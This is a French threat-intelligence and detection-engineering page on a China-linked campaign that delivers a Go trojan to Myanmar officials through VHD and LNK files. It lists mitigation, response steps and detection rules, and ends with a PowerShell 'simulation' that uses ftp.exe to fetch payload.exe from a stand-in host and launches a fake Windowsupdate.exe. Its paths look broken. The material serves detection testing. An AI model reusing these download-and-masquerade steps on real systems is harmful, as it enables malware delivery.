Acteur Lié à la Chine Utilise des Fichiers VHD pour Cibler les Diplomates Birmans
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Un acteur de menace lié à la Chine cible le personnel gouvernemental du Myanmar par le biais d’une chaîne d’infection en plusieurs étapes livrée via des fichiers de disque dur virtuel (VHD). La campagne utilise des fichiers LNK malveillants pour abuser ftp.exe pour la reconstruction des charges utiles et déploie un cheval de Troie personnalisé en Go connu sous le nom de QUICAgent. Le malware s’appuie sur Cloudflare Workers pour la résolution dynamique de C2 et communique via le protocole QUIC.
Enquête
L’équipe APT de Seqrite a analysé des échantillons de VHD contenant des documents leurres et a identifié des fichiers LNK malveillants déguisés en fichiers PDF. L’enquête a révélé une technique de charge utile fractionnée dans laquelle deux fichiers sont combinés avec la commande copy pour reconstruire un exécutable. L’analyse technique de l’implant QUICAgent a également révélé une évitement de sandbox par des hachages SHA-256 répétés et une validation de certificat TLS personnalisé.
Atténuation
Les organisations doivent restreindre l’exécution de fichiers LNK non fiables et surveiller les processus enfants suspects impliquant ftp.exe. Des contrôles stricts autour de l’utilisation des disques durs virtuels (VHD) et la surveillance du trafic réseau inhabituel sur le port UDP 443 utilisant QUIC sont recommandés. Bloquer les points finaux Cloudflare Worker connus pour être malveillants peut également perturber le mécanisme de résolution C2 de la campagne.
Réponse
Si une activité QUICSILVER est détectée, les systèmes affectés doivent être isolés immédiatement pour stopper toute exfiltration de données et communication C2 ultérieure. Les enquêteurs doivent inspecter %LOCALAPPDATA% pour le binaire Windowsupdate.exe et examiner le dossier de démarrage de l’utilisateur pour SystemIn.lnk. Les journaux réseau doivent également être analysés pour rechercher des connexions aux domaines C2 et adresses IP connus afin de déterminer l’étendue de la compromission.
Flux d’attaque
Nous mettons encore à jour cette partie.
Détections
Fichier LNK potentiellement malveillant avec double extension (via cmdline)
Fichier potentiellement malveillant avec double extension (via process_creation)
Opération manuelle ou script exécutée dans des dossiers inhabituels (via cmdline)
LOLBAS ftp (via cmdline)
Binaire / scripts suspects dans un emplacement de démarrage automatique (via file_event)
Exécution suspecte depuis un lecteur monté (via audit)
Abus possible du domaine de développement Cloudflare (via dns)
IOC (HashSha256) à détecter : Operation QUICSILVER : Acteur Nexus-Chine cible les diplomates du Myanmar via un cheval de Troie livré par VHD
IOC (SourceIP) à détecter : Operation QUICSILVER : Acteur Nexus-Chine cible les diplomates du Myanmar via un cheval de Troie livré par VHD
IOC (DestinationIP) à détecter : Operation QUICSILVER : Acteur Nexus-Chine cible les diplomates du Myanmar via un cheval de Troie livré par VHD
Détection de la communication C2 de QUICAgent [Connexion réseau Windows]
Utilisation suspecte de ftp.exe et Windowsupdate.exe pour l’exécution de logiciels malveillants [Création de processus Windows]
Exécution de simulation
Pré-requis : La vérification préalable de l’intégrité et de la télémétrie doit avoir réussi.
Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et visent à générer exactement la télémétrie attendue par la logique de détection. Des exemples abstraits ou non liés mèneront à de mauvais diagnostics.
-
Récit et commandes de l’attaque : Un adversaire vise à établir une prise en mimant des processus système légitimes. Tout d’abord, ils utilisent
ftp.exeavec un fichier script (-s:) pour télécharger une charge utile malveillante, tentant de se fondre dans les tâches administratives automatisées. Simultanément, ils simulent le déploiement d’un binaire « Mise à jour Windows » (renommé) pour masquer l’exécution de la charge utile. Enfin, ils utilisent un script PowerShell conçu pour créer un.lnkfichier malveillant pour assurer la persistance via l’interaction utilisateur. -
Script de test de régression :
# 1. Simulez le téléchargement basé sur des scripts FTP (Déclencheur 1 Partie A) $ftpScript = "open ftp.example.com`nuser anonymous anonymous`nget payload.exe`nquit" $ftpScript | Out-File -FilePath "$env:TEMPftp_script.txt" -Encoding ASCII Start-Process "ftp.exe" -ArgumentList "-s:$env:TEMPftp_script.txt" -Wait # 2. Simulez l'exécution de Windowsupdate.exe (Déclencheur 1 Partie B) # Note: Cela suppose qu'un fichier nommé Windowsupdate.exe existe ou est appelé # Pour la simulation, nous créerons un fichier factice et l'exécuterons New-Item -Path "$env:TEMPWindowsupdate.exe" -ItemType File -Force Start-Process "$env:TEMPWindowsupdate.exe" # 3. Simulez la création de LNK par PowerShell (Déclencheur 2) Start-Process "powershell.exe" -ArgumentList "-Command", "Write-Output 'create_lnk_process_running'" -
Commandes de nettoyage :
# Supprimer les artefacts simulés Remove-Item -Path "$env:TEMPftp_script.txt" -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPWindowsupdate.exe" -ErrorAction SilentlyContinue